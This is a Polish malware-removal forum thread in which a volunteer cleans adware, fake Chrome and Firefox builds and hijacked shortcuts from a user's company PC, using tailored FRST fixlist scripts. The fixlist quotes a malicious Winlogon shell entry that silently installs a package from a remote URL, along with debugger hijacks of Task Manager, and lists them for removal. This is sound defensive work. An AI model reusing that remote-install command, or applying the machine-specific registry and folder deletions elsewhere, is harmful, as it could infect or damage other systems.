BEN Opublikowano 16 Maja 2017 Zgłoś Udostępnij Opublikowano 16 Maja 2017 (edytowane) Witam Wszystkich, mam podobny problem jak tu: https://www.fixitpc.pl/topic/32598-bigfarm-itd/ dodam że nie jestem super biegły w sprawach naprawiania uszkodzonych rejestrów itp. nawet nie wiem jak to nazwać dokładnie.Generalnie mam problem z przeglądarką, też mi się samoistnie zainstalowały podobne programy. Załączam raport z GMER i proszę o POMOC!!! EDIT: BŁAGAM WAS O POMOC!!!Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem. logGMER.txt Addition.txt FRST.txt GMER.txt Shortcut.txt Edytowane 16 Maja 2017 przez Rucek Post wydzielam w osobny temat. Stosuj się proszę do zasad. Czekamy na Miszela. Nic nie ruszaj. Odnośnik do komentarza
Miszel03 Opublikowano 16 Maja 2017 Zgłoś Udostępnij Opublikowano 16 Maja 2017 EDIT: BŁAGAM WAS O POMOC!!! Nikt mi jeszcze nic nie odpisał, a jest to komputer firmowy. Proszę o jasne odpowiedzi jak dla przysłowiowej "blondynki". Zaraz mnie coś trafi z tym wirusem. Trudno bym odpisywał 24 godziny na dobę. Instrukcję będą sprecyzowane w takiej formie, że na pewno Sobie poradzisz. Są podstawione dwa prefabrykowane przeglądarki podszywające się pod Google Chroem oraz Mozilla FireFox. Oprócz tego wspomniany BigFarm zainfekował skróty przeglądarek. Amerykański adres ustawiony na routerze wydaję się być podejrzany (KLIK) - podaje instrukcje do zmiany. Wygląda na to, że szybko się z tym uporamy. P.S: Martwi mnie brak jakiegokolwiek zewnętrznego oprogramowania zabezpieczającego, same zabezpieczenia systemu Windows 7 nie są wystarczające. Przejrzyj - KLIK. 1. Przez panel sterowania odinstaluj: Zbędniki / Przestarzałe oprogramowanie: Spybot - Search & Destroy. 2. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 3. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Footjane RemoveDirectory: C:\Users\Ben\AppData\Roaming\Footjane RemoveDirectory: C:\Users\Ben\AppData\Local\Footjane C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 FirewallRules: [{DBEC1BB9-D594-4454-96FB-8C6E5E41D94D}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Ben\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Ben\AppData\Local\Firefox RemoveDirectory: C:\Program Files (x86)\Firefox FirewallRules: [{3567C494-B371-44EE-A8B6-9433F3F3BAE9}] => (Allow) C:\Program Files (x86)\Footjane\Application\chrome.exe Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-1648149943-899210602-299422045-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMjq2RkM1RWVQOWZLMTE8FTk2MdY3MdF1MdYdFdqcNc== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\setup\install.dll [104448 2017-05-15] (TODO: ) [brak podpisu cyfrowego] S2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [X] C:\ProgramData\Microsoft\AppV\setup\install.dll C:\ProgramData\Apple\Common\Cloud\WinHelper.dll U3 uxrirpow; \??\C:\Users\Ben\AppData\Local\Temp\uxrirpow.sys [X] C:\Users\Ben\Dysk Google\OFERTY BEN\SkyDrive.lnk C:\Users\Ben\Dysk Google\EMCS\EMCS Offline Generator.lnk C:\Users\Ben\Dysk Google\EMCS\Protektor.lnk C:\Users\Ben\Dysk Google\EMCS\Nowy EMCS\EMCS Offline Generator.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Ben\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Ben\AppData\Local\Mozilla\Firefox C:\Users\Ben\AppData\Roaming\Mozilla\Firefox C:\Users\Ben\AppData\Roaming\Profiles CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikację infekcji. 5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). footjane;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 6. Pobierz AdwCleaner uruchom go i kliknij Skanuj, kiedy skanowanie zakończy się wydobądź z niego raport, znajduję się on w folderze C:\AdwCleaner. Raport zaprezentuj na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
BEN Opublikowano 17 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 17 Maja 2017 Dziękuję za odpowiedź. przesyłam pliki. Addition.txt AdwCleanerC0.txt FRST.txt SearchReg.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 17 Maja 2017 Zgłoś Udostępnij Opublikowano 17 Maja 2017 Dlaczego DNS nie zmienione? To celowe ustawienie jest? Jeśli chodzi o resztę to jest już lepiej. Czas na poprawki i skan antywirusowy. P.S: Jak proszę o skan to tylko o skan, a nie o skan + czyszczenie (patrz pkt. 6) Teraz odpuszczam, ale proszę czytaj moje punkty dokładnie. 1. Otwórz Notatnik w nim wklej: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Footjane DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Footjane DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Firefox DeleteKey: HKEY_USERS\S-1-5-21-1648149943-899210602-299422045-1001\Software\Firefox 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\3333333 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111111 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-16 07:08 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\00 2017-04-21 13:57 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\22 2017-04-20 16:52 - 2017-04-26 07:13 - 00000000 _____ C:\Windows\SysWOW64\33 2017-04-20 16:51 - 2017-05-16 07:08 - 00000000 _____ C:\Windows\SysWOW64\11 EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware (masz zainstalowany, więc robisz tylko aktualizację baz i programu). Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut Dołącz też plik fixlog.txt. Podsumuj również obecny stan systemu. Odnośnik do komentarza
BEN Opublikowano 19 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 19 Maja 2017 Jeszcze raz dziękuję za odpowiedź. Z tymi DNSami to chyba celowo, nie wiem bo nie mam dostępu żeby to zmienić, jak skanowałem za pomocą linku czy połączenie z serwerem jest bezpieczne pokazywało że jest. W załączniku raporty, mam nadzieję, że teraz niczego nie pochrzaniłem. EDIT: Co do systemu, to faktycznie jest znacznie lepiej niż było, jedyne co to tak jakby wolniej się uruchamiał przy starcie. Tak jest wszystko w porządku. Addition.txt FRST.txt malwarebytes.txt Shortcut.txt Odnośnik do komentarza
Miszel03 Opublikowano 19 Maja 2017 Zgłoś Udostępnij Opublikowano 19 Maja 2017 MBAM niczego nie wykrywa. System wyczyszczony z infekcji, a skoro piszesz, że problem infekcyjny ustąpił to będziemy kończyć. Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows. Jako, że świadczymy profesjonalną pomoc i tylko taką to związku z wolniejszym startem systemu pokieruję Ci do działu Windows 7, może tam ktoś coś na to poradzi. Odnośnik do komentarza
BEN Opublikowano 20 Maja 2017 Autor Zgłoś Udostępnij Opublikowano 20 Maja 2017 Super dziękuję za pomoc! Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się